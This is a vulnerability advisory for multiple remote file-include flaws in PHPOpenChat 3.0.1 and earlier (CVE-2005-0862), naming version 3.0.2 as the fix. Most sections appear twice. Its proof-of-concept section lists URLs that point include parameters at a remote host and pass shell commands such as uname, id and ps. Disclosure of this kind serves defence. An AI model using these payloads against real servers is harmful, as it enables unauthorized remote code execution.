PHPOpenChat Multiple Remote File Include Vulnerabilities
BID:12817
Info
PHPOpenChat Multiple Remote File Include Vulnerabilities
| Bugtraq ID: | 12817 |
| Class: | Input Validation Error |
| CVE: |
CVE-2005-0862 |
| Remote: | Yes |
| Local: | No |
| Published: | Mar 15 2005 12:00AM |
| Updated: | Sep 07 2006 09:33PM |
| Credit: | Discovery is credited to Albania Security Clan. |
| Vulnerable: |
PHPOpenChat PHPOpenChat 3.0.1 PHPOpenChat PHPOpenChat 2.3.4 |
| Not Vulnerable: |
PHPOpenChat PHPOpenChat 3.0.2 |
Discussion
PHPOpenChat Multiple Remote File Include Vulnerabilities
PHPOpenChat is prone to multiple remote file-include vulnerabilities.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PHPOpenChat 3.0.1 and prior versions are reported prone to this issue.
PHPOpenChat is prone to multiple remote file-include vulnerabilities.
An attacker may leverage these issues to execute arbitrary server-side script code on an affected computer with the privileges of the webserver process. This may facilitate unauthorized access.
PHPOpenChat 3.0.1 and prior versions are reported prone to this issue.
Exploit / POC
PHPOpenChat Multiple Remote File Include Vulnerabilities
An exploit is not required.
The following proof-of-concept examples are available:
http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
http://www.example.com/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
http://www.example.com/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
http://www.example.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
An exploit is not required.
The following proof-of-concept examples are available:
http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
http://www.example.com/phpopenchat/contrib/phpbb/alternative2/phpBB2_root/poc_loginform.php?phpbb_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
http://www.example.com/phpopenchat/contrib/phpnuke/ENGLISH_poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
http://www.example.com/phpopenchat/contrib/phpnuke/poc.php?poc_root_path=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
http://www.example.com/phpopenchat/contrib/yabbse/poc.php?sourcedir=http://www.example.com/asc?&cmd=uname%20-a;w;id;pwd;ps
Solution / Fix
PHPOpenChat Multiple Remote File Include Vulnerabilities
Solution:
The vendor has released version 3.0.2 to address these issues. Please see the references for details.
Solution:
The vendor has released version 3.0.2 to address these issues. Please see the references for details.
References
PHPOpenChat Multiple Remote File Include Vulnerabilities
References:
References:
- PHPOpenChat (Albania Security Clan)
- PHPOpenChat Home Page (PHPOpenChat)
- WDT :-phpopenchat-3.0.* ($sourcedir) Remote File Inclusion Exploit ( stormhacker)